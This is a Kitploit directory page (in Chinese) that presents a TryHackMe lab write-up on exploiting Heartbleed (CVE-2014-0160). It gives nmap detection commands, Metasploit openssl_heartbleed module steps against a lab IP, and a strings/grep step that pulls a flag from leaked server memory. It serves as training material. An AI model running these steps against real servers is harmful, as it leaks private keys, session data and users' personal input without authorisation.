Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Project-Field-Analysis-and-Memory-Leak-Demonstration — 此项目的目标是评估远程主机是否存在心脏出血漏洞(CVE-2014-0160),确认其存在,并通过TLS协议利用该漏洞从服务器内存中提取潜在的敏感信息。 | Kitploit
工具/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
内存取证漏洞分析漏洞利用信息收集渗透测试学习与教育
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

此项目的目标是评估远程主机是否存在心脏出血漏洞(CVE-2014-0160),确认其存在,并通过TLS协议利用该漏洞从服务器内存中提取潜在的敏感信息。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
61年前尚未审核

Objective 本项目的目标是评估远程主机是否存在 Heartbleed 漏洞 (CVE-2014-0160),确认其存在性,并利用该漏洞通过 TLS 协议从服务器内存中提取潜在的敏感信息。

Execution

  1. 识别开放服务 (Nmap) nmap -sC -sV 52.215.184.158 结果:

plaintext PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 111/tcp open rpcbind 2-4 443/tcp open ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK | Not valid before: 2019-02-16T10:41:14 | Not valid after: 2020-02-16T10:41:14 TLS 证书是自签名且已过期的。这让人怀疑 OpenSSL 版本可能已过时。目标端口: 443。

  1. Heartbleed 漏洞检查 (Nmap Script) nmap -p 443 --script ssl-heartbleed 52.215.184.158 结果:

plaintext | ssl-heartbleed: | VULNERABLE: | OpenSSL 1.0.1 is vulnerable to Heartbleed | State: VULNERABLE | Risk factor: High | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 确认目标存在 Heartbleed 漏洞。

  1. 利用 (Metasploit Framework) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run 结果:

plaintext [+] Heartbeat response with leak, 44883 bytes [+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin 成功转储内存数据并本地保存,用于后续分析。

  1. 分析内存转储文件

strings openssl.heartble_152689.bin | grep -i "THM{" 结果:

plaintext user_name=hacker101&user_email=[email protected]&user_message=THM{sSl-Is-BaD} 成功从 TLS 内存中提取出机密数据,包括一个应用标志——这证实了该漏洞可被实际利用以泄漏敏感信息。

Conclusion 我成功识别并利用了一个远程服务器上的 CVE-2014-0160 漏洞。整个过程包括:

使用 nmap 检测漏洞

使用 Metasploit 利用该缺陷

从内存中提取实时用户提交的数据(包括标志 THM{sSl-Is-BaD})

Business Impact 在公开暴露的系统中存在 Heartbleed 漏洞会带来严重风险:

可能泄漏 TLS 私钥

会话劫持

用户名、电子邮件及敏感用户输入曝光

下载工具